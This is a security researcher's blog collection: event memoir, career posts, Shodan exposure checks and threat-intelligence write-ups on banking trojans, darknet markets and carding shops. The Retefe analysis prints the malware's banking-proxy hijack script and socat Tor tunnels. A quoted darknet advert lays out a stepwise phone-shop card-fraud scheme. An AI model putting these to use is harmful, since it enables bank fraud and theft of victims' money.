BSides Liverpool

It was 3 years ago or so i had the itch to put together a Bsides Event in my home town, i’d worked in this industry for about 20 years now, i’d make a really good set of relationships from a large number of companies.

I wanted to give something back, that was an event in the middle of my city. I arranged a call with incredible Jack Daniel and he spoke to me for about an hour on his porch swatting away various insects in the summer heat. He carefully explained to me, someone with no event organizing experience how to bring together sponsors, attendees, speakers and everything else in between

Then, BSides Liverpool was born.


In late 2016, i arranged with my then team mates at Fujitsu how i would plan the event. We’d have various tracks on security including a rookie track. I’ve found i get an incredible amount of enjoyment out of mentoring, so i was excited at this prospect.

Now, it was originally planned for the Summer of 2017, then 2018. You get the picture. Late in 2018 i bit the bullet and registered a twitter account with the name of bsideslivrpool, as the original ‘bsidesliverpool’ was already taken.

This was a huge step for me, famously procrastinating over select details. I received a DM a few weeks later asking who was behind the account (It was Jenny Radcliffe!), having already reached out to a few people. i couldn’t think of anyone better than Jenny Radcliffe. I’d known Jen for a few years having been bewitched by her incredible social skills, someone who can put a complete stranger at ease and get anyone onside in moments is an amazing skill, it’s no wonder she is called the People Hacker. I had assembled an amazing team already.

Myself & Jen quickly realised that someone like ourselves with all the Scouse determination was likely not going to be able to orchestrate an event at this scale! However, we both knew someone who did! Step forward Mr Stuart Coulson. Stu, my friend, my mentor is someone who i’ve grown to respect every single day with a level of integrity unmatched in this industry, he was at the very first public talk i ever gave in Blackpool and gave me some incredible feedback.

The team was complete!

The team was complete!

We both agreed he would be a perfect fit on the team, befitting of a inaugural event from someone who did this sort of planning for a living. I was proud to welcome to Stuart on board as a co founder and organiser.

One final person to join the organising committee was the wizard Antisocial Engineer, who can do things with a keyboard that i wish i could!

The event gathered some incredible sponsors, we hit our goal very quickly! Thanks to the teams efforts we got the swag, the venue, the speakers, the attendees tickets and helper squad sorted.

The above two sentences don’t do justice to the large number of Skype calls, the telephone calls, the Slack messages, WhatsApp conversations we covered over 6 months of consistent badgering for sponsors, CFP and other stuff. I can’t do it justice here it’s just not possible.

The event arrived, June 29th which was comically the hottest day of the year, we put the event up in the Maritime Museum, made solely from bricks and mortar and what felt like zero air con. I had badgered/asked some incredible researchers to come and speak at the event, they delivered — Thank you all.

The event went without issue, or so i thought.

There was a tweet, there is always a Tweet.

A now deleted tweet pointed out the panel was made up of 4 white males, one being my friend Stuart Coulson. Another containing two long standing members of the security community who had been drafted in at literally days notice to fill in for a panel which was beset with tragedy. The final member was a relative rookie, talking about how his journey into information security has been (18 months iirc)

You can read the “apology” from the account here I won’t belabour the response already given from our team which you can read here

Infosec Drama’o’clock

Our team put an untold number of hours into developing this conference, and when there is negative, or unconstructive feedback, i, personally take this extremely personal. I come from a very poor background, and i am disabled, and understand somewhat how difficult and painful this industry can be as a minority, to have someone pass judgment on a single photo which in the cold light of day was a all white male panel, shows us the event in a poor light. The ‘drama’ that gets passed around is the result of systemic problem Twitter has in everyone has an echo chamber and you usually end up arguing with everybody without a response to the original problem, this was a perfect example of that.

We received incredible support both in the Twitter thread and verbally, i would like to thank you ALL for your support for the event.

I took this personally, as i often to i felt responsible. As someone who thinks of themselves as someone with the ability to manage the expectations of many whilst balancing the nuanced realistic expectations. i saw Twitter in the most disgusting way i’d ever seen. I saw abuse directed at my teammates, i saw a racial slur used to describe the panel. I hated it all, i absolutely hated it — all because of a photograph.

I’ve spoken to the team, and i will no longer be an ‘organiser’ of BSides Liverpool, I will be around to support my friends 100% but the team needs someone who is mentally stronger than me, who isn’t as emotionally attached to things as i am.

There is nothing wrong with being passionate about something, but when that passion becomes pain, it’s time to take a look outside. This may all seem a bit dramatic and it probably is, i just felt the need to respond in my own way.

Thank you to Jen, Stu, Rich, Jack, Lee.

Threat Hunting for Free¹

There is no network perimeter anymore!

¹ Free in cost only measured by time and effort.

Well, there is. 

Whether we like it or not, and defending them is hard, visibility is even harder. Risk management, a risk register, a vulnerability acceptance posture. Yeah, you usually hear about this after a security incident. There are some things you can do do fortify your defences, and they don't require a business case to implement, they don't need a project manager, and they likely cost less then a coffee.

Adversaries, attackers, breaches, hackers, all words familiar words in todays landscape, but its not as bad as it would appear, you can do a lot for not a lot of your time and effort, in this blog i will show two services that you can automate and remove a level of uncertaintly from your blindspots.


Firstly, there is 100 quality blog posts on defending your network using Shodan, and i will not try to do better than them, using my own experience and methods i'll share some ways to gain insights into how attackers use shodan to leverage a entry point, or a vulnerability.

So firstly, you'll need to get a Shodan account, there are super cheap, and usually around Black Friday do a lifetime account. <> once you've gotten started here, familiarise yourself with the CLI interface and install the tools required using 

$pip install shodan


shodan init API_KEY_HERE

once you're done installing hit the -help switch to get a list of help commands, and <> and critically, the banner specification

So, in our case we need to identify a subnet to monitor, John has perfectly described how to do this here  but this post goes a little deeper.


So, unless you're fortunate enough to never have heard of SMB or Ransomware, then you are likely going to be very bored by this set of investigative steps.
We're going to use a well known range of addresses to identify SMB exposure, and then run to someone internally and have a long chat about Ransomware insurance or Microsoft upgrade paths, whatever is cheapest (YMMV)

 So, we have our range of addresses from Azure. We're going to use this list from here <>

We are going to use from the Microsoft Azure datacenter list, so given this is a public address lets go

First we go with:

shodan count net: 1375

This will output a total number of devices shodan can see, not very helpful so lets chop it up a little more. 

Cool, so lets say i was an attacker i'd be interested in the path of least resistance right? SMB, RDP, etc, fire up my metasploit, and then watch as it exploits it all for me.

So lets check out if 445, or 3389 are open in this range. We need to extend the results list a little to be able to see.(AFAIK Shodan defaults 300 results)

shodan stats --facets port:500 net:

will return a list of the top 500 ports and guess what



Of course the ports being open doesn't immediately mean pwnage, and nor should it. Multifactor authentication is available for Azure (Not free) but for admins it is, and 445 needs to be vulnerable and of course you can use other stuff like Authy and for o365 there is guidance here. You can check this out using the following command

shodan count port:445 net: SMB vuln:MS17-010

In my tests, the results was ZERO, so thats good news. So that is a very small step on protecting the perimeter for less than the price of a coffee, and about the same time as it would take to drink it.

Here Phishy, phishy...

Next, is the excellent tool from @x0rz here

I've been using my own version of this tool, customised to use some more personally interesting topics such as banking, and US Political lures. You can do the same for your own company as i've done in the past with varying success, in our case we're using Microsoft. So we can just comment out all of the junk and put in the following (I recommend combining it with DNStwist) then we have a long list of likely typo domains, and some which are being used in the certificate transparency generation list. gives us a lot so if we use these in conjunction with our list of we may get lucky, this can help us lower the risk of users being phished, or landing pages used to harvest credentials as observed recently by Microsoft here

Some results here

Happy Hunting


Journey into Security - Part 2

I was fortunate enough to work with some incredibly talented people in my journey into security, who helped me understand difficult concepts, some of which I am still learning.

  • Cryptography
  • Windows Internals

Two skills I believe are absolutely key to working in security because no matter where you go inside security you'll need an intimate understanding of both, so that's where i decided to start, i was working on user virtualistion software, this is, in essence, a reflection of roaming profiles, and using some magic to ensure a consistent user experience across all platforms, including physical and virtual desktops, not limited to stuff like published desktops from Citrix, Vmware & Microsoft. 

I furthered my understanding by buying a couple of books..



Learn that sh*t

I probably refer to at least one of these books once a week for a function or the parameter of a service, partially because I have a terrible memory. In that role, I was automating some of the work I was doing and came across tools like psexec, sysmon and the rest of the toolkit. So like any analyst, I automated some of my testings and begun to explore the rest of the tools.

Process Monitor & Explorer - thank you, Mark and Bruce!

I used this to troubleshoot registry problems, identify login issues and generally understand what was happening during login. A low-level way of examining & testing bugs that I was trying to non-programmatically troubleshoot.  

Little did know that during the troubleshooting I would identify malware infection in my own lab, I was able to track this down using some of the inbuilt filters which captured the process running when I visited a certain site. This was the moment I knew I was interested in malware. I didn't have any idea what it was capable of but I knew how to identify it and how to remove it.

Moving on

I was 'content' at the role I just mentioned, and had a passing interest in security, but became more and more fascinated by some of the articles being published online I attempted a few ctf's and failed miserably, I didn't know what I was doing, and although I was curious - I took defeat very badly, and personally. I was persistent - I started visiting some forums and asking questions, i joined and starting reading the content, copying and learning.  I also learnt of Lenny Zeltser as part of my research and found this which was at version 5 i think when i discovered it, and it included cheat sheets on taking apart malware! I was saved, i had step by step guides on using the tools I had watched, and learned a lot (Thank you, Lenny!)

I had a keen interest in attending FOR610 and joked ' i would give my first born to go', the reason was that it was super expensive. I learnt an awful lot on this course and still refer to the course materials to this day, both Lenny and his colleagues are incredibly helpful, approachable and clearly enjoy what they do. 

I've spent a few years at Fujitsu now and learnt more than I can possibly write down here, but some of the highlights included working alongside great people, and being fortunate enough to work at the NCSC as part of the previous Fusion Cell, and now known as Industry 100. Representing Fujitsu on a number of occasions all over the world, and attending Blackhat & DEFCON. Speaking at conferences on behalf of my employer is something i am incredibly proud to do, and something which impresses my daughter even more - which is all that matters.

Giving back

I have the opportunity to share what I know and have learnt. This kind of opportunity is something that gives me an incredible feeling of gratitude knowing I am assisting those who need to learn, like me I forever refer to myself as a 'noob', because when you realise you know everything, you realise you know nothing. The opportunity in question is working alongside some talented people at CTU in Prague on a project called CivilSphere working remotely to protect those vulnerable from being targeted. I have always been impressed by the work done by the likes of CitizenLab and was inspired to try and be part of this protection network. I am very thankful to Sebas for this opportunity, and all the talented people at CivilSphere.

Next Steps

I will be leaving Fujitsu in a few weeks, to start a new role at Proofpoint. I look forward to learning more interesting concepts, and being a noob all over again.



Journey into Security - Part 1

I consider myself a noob, forever asking simple questions. Just how does DNS work? WTF is a floating pointer. A lot of these questions borne out of curiosity, and a few people said they would be interested in hearing how I got into Security. So i decided to write it down, it feels very much ' LOOK AT ME HOW COOL I AM ' and self indulgent writing this, but that couldn't be further from the truth, i hate talking, or writing about myself but in light of the current state of security, and being considered a mentor to a few people and working with extremely bright people i felt obliged.

I have loved computers ever since i could remember, i won't bore you to tears with my first computer because its likely the same as most people my age, but here is a photo of it. 


2Mhz CPU

A shared computer at home, no games.

Fast forward a very long time to my teenage years and I was asked to help out at a family friends place of work, they had high-speed scanning of documents(invoices, purchase orders etc), I automated parts of this job and put a few people out of work (sorry) With this came the management of the storage of the scanned items, which came with the ability to identify secure methods of storage. At this point, an online presence was just emerging in terms of retail so it wasn't really a consideration that at some point payments would need to be taken online and managed in an office and placed internally. So my curiosity led me to a device known as a domain controller (Windows 2003 SBS) which contained the following 

  1. DHCP
  2. DNS
  3. WINS

WTF was this? and what did they all mean, well i needed to understand what I was working with some I quickly spent a lot of time on  place called TechNet, before Microsoft released the useless bots to answer questions, it was a thriving community with a lot of answers and help, I learned the basics of network management here understanding what a subnet was, and why it was important to track who was using what range, and I why. ( Think credit card processing )

Now I realized at the time a lot of letters started to appear on the signatures of my peers ( MCSE, CompTIA) I thought, what was this? a quick Yahoo!( yes, yahoo ) a search showed me that Microsoft was giving certifications to people who took tests and with that came the letters! Cool, I thought, i was in my 20's and had not sat a test since school, and i did not go to University so it was natural to try and test myself. That particular employer did not give me any training so i had to leave and ended up at one job (i have missed out two roles here that do not have any impact on my journey into security ) - i ended up at a communications company, dealing with MPLS, leased lines, dedicated fibre links etc. Basically, the stuff that powers the internet & telephony.

My first job in this role was to 'map the network' - wait, what? I didn't have the slightest idea where to begin, routers? Switches? i was a Microsoft specialist and had sat away from networking because of dedicated resources, i had the opportunity to understand these things and did so quickly, i had a vague idea of the topology and was able to Visio a map in about 14 days. This was as much a test for me as it was for the company, we had:

  1. WAN Router(s) exposed by default auth
  2. Hardcoded credentials in reception for wifi
  3. Gold Images that had no updates applied for over 10 months

So at this point, i had access to an Active Directory with approx 3,00 users and mobile devices, computers which ran XP and a Windows 7 deployment upcoming. This was my job to manage, design and deploy. I was very scared. computers where something i used not something i knew what to make use of!

I was extremely fortunate enough to attend a Microsoft Course which was titled ' Fast track to managing and maintaining an active directory domain 2003,' , this course 5 days away from my home in a strange city taught me so much, i had 10hrs a day exposed to an active directory domain that i build and could break and rebuild without the fear of a P45 arriving, i got further into some concepts that i had come across ( DHCP, DNS, WINS) and some other more interesting concepts which iginited my interest further.


I had long been in awe of security specialists, I had only minor interaction with these superheroes, they usually worked in a Firewall team, or some other amazing sounding team - and would only appear when things where bad, so that was my interest, what DID these people do?  Well i quickly discovered that a set of ACLS on a firewall was not as interesting to me as managing a forest of objects for thousands of people and understood securing active directory was much more interesting, i started to dig into Active Directory and trying to understand further i quickly learned about a few things

  1. Active Directory is hard
  2. Active Directory is hard
  3. Active Directory is hard

Now the grizzled amongst will say it's not, I completely disagree - the entire concept of Active directory has been badly managed, and whilst its now an entire attack surface and has brought to light some of the most incredible attack methods, there is very little in the blue team area of protecting Microsoft Active Directories.

So. after dedicating a few years to becoming a specialist* in Active Directory security, i moved on. A role in the legal marketplace. I was protecting the assets of solicitors, a domain unlike any other i've ever worked in before. A difficult but challenging role because of the reliance of physical documentation for legal professionals restricted much of what is digitised. 

Exams, Exams.

Screen Shot 2018-03-04 at 2.13.43 pm.png

I was very boring for a few years, taking exams every few months.


One day, I arrived for work and was told i would be sent on an ' intervention', this in the UK refers to a concept when a legal practice is in distress a member of the 'SRA' will intervene and take over, this included all electronic items. I was basically an IT bailiff.  

I had managed antivirus solutions because nobody else would (Who can blame them?) but quickly realised what a GOLDMINE of information was being identified, it was a pretty default policy ( block, allow, delete, quaratine ) the little friction it was generating was not worth the cost of renewals, so I changed it an applied it to different machines, using different policies depending on location and level of practise seniority, I didn't want to get the sack because a partner of the practice couldn't plug in the USB device he also used at home. 

I was identified as a potential for the intervention ' because Bryan knows security '. Did i? Not really, but I did know how dangerous office macros where and why IE6 really shouldn't be used. Let's go - anyway, an 'encrypted database' was being used to store all client data and we needed it to be able to 'take on the cases'. the 'encrypted database' was a Microsoft Access database, it was trivial to crack, made even easier by the fact the password was stored in passwords.txt in the same directory.

Anyway, I was hailed as a savior and even though no laws where broken, that resulted in a lot of money being earnt, and my value rising too (all because of a password policy?)

So i was given access to be able deploy my OWN antivirus policies as a result of some good work around ' finding passwords in directories called passwords', i had shown interest so there we go.

I deployed extremely restrictive policies to execs, so much they complained, i updated device controls to prevent data loss via mobile phones, and usb sticks, and identified the malware as a result of this and thought ' well this is cool', im using something someone hates to hear about to find all this bad stuff, who wouldn't be interested in this?!' Turns out it was only me, and this is where my security passion was really born.

Hello, Pentester 

Fast forward a few months and i received an alert from my very restrictive policy alerting me to someone running passwordump.exe on my domain controller, but not only did i lay a very small egg in my pants but i was worried because the domain controller was a honeypot. I had deployed a few domain controllers in a sense that they advertised the services to a would be a attacker but contained no actual resources. A modern day RODC but RODC was a thing. Turns out we had a 'black box' pen test in which the manager was aware of, i quickly identified the pen tester in a room he had 'walked into' and plugged into a telephone port, identified the DHCP range as being broadcast from my 'domain controller' and thats all - i just named the server as DOMAIN CONTROLLER and no ntds.dit was enough to attract the attention of his toolkit. The server was only running DHCP.

Anyway i tried to take control of his session, and this image made it into the eventual pen test report as a way of positive feedback on deception.


LOL no

LOL no

What does this button do?

I moved on from that role, as my passion for security grew I moved to a company that was responsible for user virtualization, I learned more here about user profiles than i can ever forget, the stages of authentication involved in a login, the handshake and crucially the concepts around Kerberos and NTLM - had a core understanding of authentication and the reliance on trust for authentication, and with this came a more curious minded approach, I worked with extremely talented developers and students who where driven by curiousity from an academic sense, I was purely trying to learn and stop being a noob. I was in a QA team, a bug hunter! sadly, the only bugs that drew attention were not ' this button works', but that the storing of plain text passwords in SQLite databases kinda bugs.  Along with the realisation that I should be documenting every single thing I ever needed to know in a physical form so I bought Moleskines

Lots of them.



Write that sh*t down

As I've written here I have realised a second part will be much more interesting than one long boring post. It will include more of the recent stuff, a failed CISSP study attempt,  how I identified bugs before bug bounties were cool & some malware stuff.

Panel party - Loki, Pony.

Hunting via Hybrid Analysis I identified persistent offender(s) storing content on a panel. I kept my eye on it for a while, and when it was busy enough, I managed to get the entire server configuration panels.

Wallet stealer
  1. Loki admin
  2. Pony admin

Usernames, passwords for MySQL and database configurations, over 100 lists of target applications, BTC wallets, FTP clients, browsers, games

The most interesting thing for was that Loki has a POS module.

Here is the contents, ping me it become unavailable

  • SHASUM: 591cc7fe34d5cd76c7bd8be4ee9d94741e293946

Have fun.

Russia v Ukraine : A primer for the uninitiated

Russian intervention in the Ukraine, be it military or 'cyber', historically has been something of a strategic playground, whilst other attacks observed are more 'noisy' - or disruptive, the ongoing incidents which can be, and will be attributed to Russia. If like me, you're a scholar at the aspects of cyber incidents particularly when it comes to Russia v Ukraine which experts will quickly identify and theorize are the work of the shadowy Russian bear(s).

My own learning has focused on 'why', and I've digested  and recommended the following

  1. The 'ultimate' guide, in my humble opinion, is here Russia v Ukraine  Kenneth Greers
  2.  APT28 or depending on the vendor
    Pawn Storm,
    Sofacy Group,
    Tsar Team,
    Threat Group-4127,
    Grizzly Steppe (when combined with Cozy Bear) The important part to note here is that APT28 is widely believed to be GRU, and GRU are explained in detail here 
  3. APT29 or Cozy Bear, again depending on the vendor may be called any of the  following Office Monkeys, 
    The Dukes, 
    Grizzly Steppe (when combined with Fancy Bear)

This is the best infographic I have seen explained the process of APT28/29 activity.



There are a breathless number of analysts capable of dissecting the incidents that occur within the Ukraine borders and often more are bullet quotes seeking to encourage fear, uncertainty and doubt, AKA FUD. My experience of working with some extremely talented analysts both in the Government and at F500 who actively avoid headline-grabbing and offer comments by way of research and analysis. Robert M.Lee explicitly called out this type of behaviour and asked 'stick to the facts'.

The concept of 'hackers' knocking out power in a country is one which evokes a large number of reactions, I look to people like Robert M. Lee for measured and sensible analysis, as should you - if your number one source for information is mainstream media, you won't get insights, you'll get clickbait.

With that in mind, the elephant in the room is the 2016 US. The election, something which those not directly involved in intelligence, be it cyber or policy will still be closely unpicking. I recommend the following content for insights how the 'fake news' - and i still can't say that phrase with a straight face, helped undermine the political agenda.

Some of these are incredibly long-winded and contain quite a lot of personal sentiment, but if you can decipher that and understand the underlying themes in that disinformation played a significant part in the U.S Election you'll understand what a weapon social media has become and why, as a 'Cyber Threat' analyst, you'll be required to place extremely close attention to it.

Cambridge Analytica

tl:dr - big data manipulated everyone.

The Plot to Hack America by Malcom Nance

tl:dr - Coincidence takes a lot of hard work, Also - Russia sought to manipulate the election by way of a number methods including social media propaganda, hacking of DNC emails and strategically placed adverts

Is Ukraine the Test Lab for Russian - Wired

tl:dr - Attackers gained access to critical systems, excellent analysis from Dragos here 


Retefe v OSX.DOK Part 2

I last month had some time to look at the latest iteration of OSX.DOK/Retefe for macOS and thanks to Jaromir from Avast and the excellent VB presentation I can conclude they are almost identical, the reasons for this include the following:

From the presentation at VB Avast noted

The below is collection of the some of the recent samples collected from Swiss campaigns targeting OSX victims.

The payloads are being signed with developer certificates presumably either stolen which enable them to bypass the macOS security feature known as Gatekeeper, it's not clear how these accounts are being used or if they are using pseudonyms to prevent suspicion below are some samples. You can use the codesign command with relevant parameters to identify the signed status of the app bundle 

Masquerading as


All macOS apps need a manifest file known as a info.plist file which includes the MachineOSBuild as a tag, which in this case was 13F1911 which is commonly known as OSX Mavericks, which means it was likely a Virtual Machine or the developer has an older OS 

The samples are UPX packed 

Screen Shot 2017-05-17 at 22.57.44.png

I've just uploaded one single sample for researchers to analyse, however, Apple is actively investigating the misuse of these certificates.

  • 11/05 notify Apple Security
  • 13/05 confirmed incident with Apple Security
  • 17/05 shared developer identities with Apple

Retefe and OSX.DOK - One and the same?

A few vendors announced a malware family known as OSX.Dok which targeted OSX, using strikingly similar methods that i had seen used by Retefe, having observed some of the configuration changes recently, this seemed too similar to be a simple coincidence.

For those unfamiliar, Retefe is a trojan, and numerous configurations exist which usually target most EU banks. The United Kingdom, and France but a real target in my own experience has been Germany and Switzerland. This article last week identified Germany but included a Swiss screenshot by Checkpoint here so slightly confusing.

The part of Retefe which struck me as similar included the proxy .JS file for the trojan to identify the range of banking sites it wants to intercept.

function FindProxyForURL(url, host) {
    var proxy = "PROXY paoyu7gub72lykuk.onion:88;";
    var hosts = new Array('*', '', '*',
        '*', '', '*', '*',
        '*', '*', '*', '*', '*',
        '*', '*', '*', '*',
        '', '*', '*', '', '*',
        '', '*', '', '*', '*', '*',
        '*', '*', '*', '*', '*',
        '*', '', '*', '*',
        '*', '*', '*', '*', '*',
        '*', '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*',
        '*', '*', '*');
    for (var i = 0; i < hosts.length; i++) {
        if (shExpMatch(host, hosts[i])) {
            return proxy
    return "DIRECT"

from the OSX version which include the following LaunchAgents

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050

You'll note the .onion site in question is present both in this configuration and in the article discussed above. Additionally, the similarities continue:

Retefe       OSX/Dok

Root Certificate    Root Certificate

Proxy hijacking   Proxy hijacking

paoyu7gub72lykuk.onion paoyu7gub72lykuk.onion

Banking trojans have been at the forefront of media for a while, and the revenue they generate are clearly attractive to criminals and to law enforcement as demonstrated recently both here and here.






#MongoDB - A dumpster fire of cry laughter

Thankfully, a lot of interest is on MongoDB over the past few weeks. It's not a new problem, however, the more people reporting on it the more C-level people will ask the question of 'where is my MongoDB?'

John Matherly originally wrote about this in 2015 This entry has since been resurrected and will no doubt be again resurrected in another 12 months. A significant media outlet are taking note in this extortion practice and for me, whilst painful for the victims this is simply part of the stratagems associated with online survival.

There are circumstances in which you must sacrifice short-term objectives in order to gain the long-term goal. This is the scapegoat strategy whereby someone else suffers the consequences so that the rest do not.

So, with this in mind. Let's take a look at the data currently available as of 05/01/17. Data will be redacted, I don't want the responsibility of dealing with the consequences if they are eventually extorted.

  •  Job Site

IP address, location, current job title

  • Health data 

Passwords, DOB, Weight, Height, Phone number, Diabetic status, last login IP

  • An android .APK backend for tracking users of a Satellite app

Some further data included, Network type, IE: 3G, 2G

The Money Team - A multinational fraud gang

The thriving carding forums that reside under most .ru domains or .su offer a significant amount of diverse fraud options, ranging from simple carding fraud from dumps or CVV dumps. I had identified, ' The Money Team' by way of their preference for offering what is known as pink slips.


Pink slips are known better as those used in financial dealings, and in particular Insurance firms. Those fraudulent forms used here are targeting the following

  • Alpha Insurance
  • CSG
  • FAC
  • Ingosstrakh - A Moscow-based entity with financial stability rating of A++

Offering a substantial amount of documentation via a DNM for the following prices, which are competitively priced based upon a sliding scale depending on amount purchased. IE: more slips, the cost goes down.

  • 1 completed application form - 2500r
  • 10 letterheads - 900p 
  • 20 forms - 870r 
  • 30 forms - 850r 
  • 50 forms - 700r 
  • 100 forms - 650r 
  • 300 forms - 550r 
  • 500 forms - 500r 
  • 1000 forms - 450r 
  • 5000 forms - 400r 
  • 10000 forms - 380r

As a potential buyer of the documents you can request a sample, a reputation as a buyer is required, and if you're feeling adventurous you can ask for a courier such as SDEK/DIMEX/CSE.

Branching out, and diversification of a criminal enterprise is key to success and the soon to be launched site offers a direct link to their trades

The site unsurprisingly sits behind CloudFlare 

I will be paying close attention to what other services pop up from TMT.


2016 a year in Review

Goodbye 2016

A year in security is a considerable amount of time, the amount of breaches, attacks and disclosures have been almost non stop and we're not finished yet. I have listed below some of the most notable 'cyber' incidents which caught my eye for a number of reasons.

  • HSBC Bank attacks - January 
  • Operation Dust Storm - Feburary
  • DROWN vulnerability - March
  • Panama Papers - April
  • RDP Bruteforcing - May
  • Democratic Party Hack - June and of course the disappearance of Angler around the same time and NATO recognises Cyber as a '5th domain of warfare' 
  • xDedic forum - July
  • ShadowBrokers 'dump' - August
  • Brian Krebs DDOS attack - September and the Congressional oversight releases the report on the OPM breach 
  • Trickbot - October
  • Three data 'breach' - November
  • Avalanche takedown - December Bonus video footage of the arrest here  

No real surprises for those in the trenches of security, I've missed out some of the more 'media' friendly stories as cyber became front page news this year, with every DDOS and breach impacting those who have zero idea how the incident will have occurred.  Typically cloudy responses from the organisations affected do not help the affected, or more importantly the victims.  

What are companies doing to ensure this doesn't happen to them? The basics, the advanced intelligence led security endeavours to look for the potential attack vectors and methods being used elsewhere, and deriving the intelligence from them, but the fact is most attacks are NOT sophisticated. This phrase is only tagged onto those incidents that make front page news, or as i call them the BBC factor. I am a big fan of @thegruqg for one his clarity in tone for security along with his razor wit is good to see in security, he is a poster boy for security snark and backs it up with proof.

The ultimate being this tweet

New rule: if you are hacked via OWASP Top 10, you’re not allowed to call it “advanced” or “sophisticated.”


And he is so right, Tesco may have been hacked by a vulnerability in the back office system, or an insider threat offering access to his terminal for transactional access, but the fact remains few of the breaches above where ' sophisticated'

  1. xDedic - bruteforcing RDP sessions
  2. Three Data incident - insider
  3. Panama Papers - SQL Injection
  4. Brian Krebs DOS attacks - hardcoded passwords and insecure protocols in CCTV, and DVR systems
  5. OPM breach - ignorance of the clear threats and lack of understanding from top to bottom, which resulted in the Oversight report and the person at the top losing her job.


2017 predictions are here, and i'm totally serious

Security predictions for 2̶0̶1̶7̶ 1998
1. Macro malware
2.MD5 passwords
3.Companies threatening security researchers for disclosures.

#Dridex has big ambitions..

Dridex, Dridex. The bane of so many people's lives. My included. Has been 'quiet', i made a post in the hope it had gone away. It had not. It has returned with a couple of new Botnet ID's, 144 and another 1024 which i am still working on.

Includes a list of interesting targets.

The interesting part is the 'sgoldtrakpc' part, which leads to this conclusion:

FPS GOLD provides core processing and eBanking software for community banks across the United States. We offer the solution to all of your banking challenges—including ever-changing regulations and security threats. And the FPS GOLD solution is fully integrated, saving you time and money.

From the sample Matt posted and the one i was analysing, included a comprehensive list of commercial banking applications, and also an improved list of enterprise applications. List is here see the comments for the full list.

Samples used in analysis here & here

Incidentally, Dridex has historically been delivered by an macro enabled document, Microsoft recently backported a good solution to blocking these from downloading malicious payloads using this - but it was exclusive to Office 2016. Thankfully, it's now in Office 2013! Please install this patch ASAP.

Going shopping on the Dark web

I've recently learnt the impact of what, we the, 'entrenched' take as the norm. Case in point


To the vast majority of security, this is not 'news', but that doesn't take away the fact that this is equally as important to those affected. Graham Cluley also has some thoughts on it here

But what hackers frequently do these days is use a technique known as “credential stuffing” - taking the information they have stolen from one site, using it to log into another site, and then using any information they gather on any accounts they manage to access to gather additional personal information which could be used for fraud.


So with that in mind, i thought i would demonstrate what is available on one of the more popular 'Darknet Markets' - A primer here on that area here

Firstly, some markets are usually quite accessible.  A good list here There is an exception to the rule for some markets that do require a deposit, or a cosign from someone legitimate enough to 'vouch' for you.

What can i buy?

Lots, you can can usually identify the interesting things in much the same way as most auction sites do, by way of feedback. A quick run down on some of the items, physical and virtual and the services associated with them are below

  • Banking

I wrote about muling here but the level of services used in between these are not limited to muling, there are 

  • Carding Services - Hotel fraud, such as booking services and ticketmaster gift cards.

Screen Shot 2016-07-26 at 21.23.54.png

Damaging to the brand associated with the theft & fraud.

  • Bank Account transfers - Often taken from compromised devices or those botnet owned.

  • British Airways accounts - Often from RATTED machines

  • Weapons - Yes, you can order a weapon from the internet

Personal information is a commodity in itself and arguable the most valuable, however its value is dependant on those who can best use it to gain most profit, its for sale here too as mentioned in relation to the original o2 article.

The insider threat is something which is gaining a lot of attention and will only grow as a exponential threat to businesses who do not understand the concept.

This advert offers an insider inside all of the UK's most popular Phone stores

Boggalertz - Best Seller in the world, just wait and see.

Please read this carefully************

To take advantage of these profiles you will need the following
1) An insider in any phone shop
2) A credit or debit card, which you know the pin and registered address for
3) there must be at least £10 on the card
4) This is for UK only

Heres how it works.......
* You send me the door number and the postcode of the registered card, EXCLUDING the LAST 2 LETTERS. ( SO I DON’T EVER KNOW THE ACTUAL ADDRESS)
* I will send you back a profile which will pass for mobile phones in ANY phone shop, providing you use the correct card
*You go to your insider and place orders for as many handsets as you can get your grubby little mitts on
*You leave me nice feedback and tell the world that BOGGALERTZ is the worlds best seller!

You will need an insider because of 2 reasons
1) the DOB may not match what you or your striker looks like
2) the name will not match the name on the card (which I will never know)

Again, to the majority of the security community this is not a 'new' concept. However encouraging mainstream media to take an active interest in this will highlight its availability and ensure that those at risk are educated more and understand the risks.




Tools of the trade: An intro.

I received an email from someone just starting out in security as a chosen career path and had bought a laptop to use purely for research. I don't particularly advocate any one laptop over another, i use a *Macbook for two reasons

1. Resale value

2. The screen is amazing, and my eyesight is getting progressively worse.

I outputted a list of my tools and was surprised at just how much i had customised my device.

  • KnockKnock from Patrick Wardle, along with a lot of other tools are available here "KnockKnock... Who's There?" See what's persistently installed on your Mac. KnockKnock uncovers persistently installed software in order to generically reveal malware.
  • Little Snitch - Essentially a firewall, but offers usability.
  • Hopper - Disassembler for x86/x64 RE - Not free.
  • Radare - Another disassembler, my personal preference.
  • Brew - It's amazing OSX comes without half these tools, but you'll quickly realised you need them.
  • Shodan command line  - As above, really is part of everything i do.
  • Olevba - Excellent parsing for OLE files, usually MSOffice.

As an addendum, there is an brilliant 'hardening guide' for OSX here

N O T E : this is for beginners, as a more seasoned security researcher you're probably used to seeing these tools and probably shouldn't be reading this.


*Other excellent Laptops are available




Inside an international Carding shop

There is a world wide trade in stolen, or compromised credit cards which often end up in the hands of a few criminals who instead of attempting to spend the cash will choose to sell the content to those who can better 'cash out' and move the compromised content into account(s) that can essentially launder the cash. Muling and laundering reports here and here from Europol

Support manager shop (English) Please contact : ICQ ID : 684523892Email : Yahoo : Chim_ThaiLan

The ICQ number 684523892 is associated a large number of results all associated with the trading of stolen/compromised credit card details. One such shop offers a significant amount of coverage including the US, China & EU

There are two types of cards referred to as 101 and 201

201 = Larger limits and no regional restrictions but requires chip verification

101 = Restricted limits (the preferred for criminals and those learning the carding game) and not chipped.

The rough translation of 'Chim_Thái_Lan' is 'Birds Of Thailand' which could be a reference to the location of the carding operation in terms of Asia, the shop offers assistance both in Thai & English as well working between the hours of BST and +6 Thai time.  When i asked for the rates and promised on purchasing i was faced with the following :

Thank u for interest!! rates below and promise value (:

? - DUMPS 101 Track1+Track2+PIN.
? - DUMPS 201 Track1+Track2+Track3+PIN.
? - Daily update.
? - Fast automatic payment methods
? - Replace lost/stolen/hold/card error/call
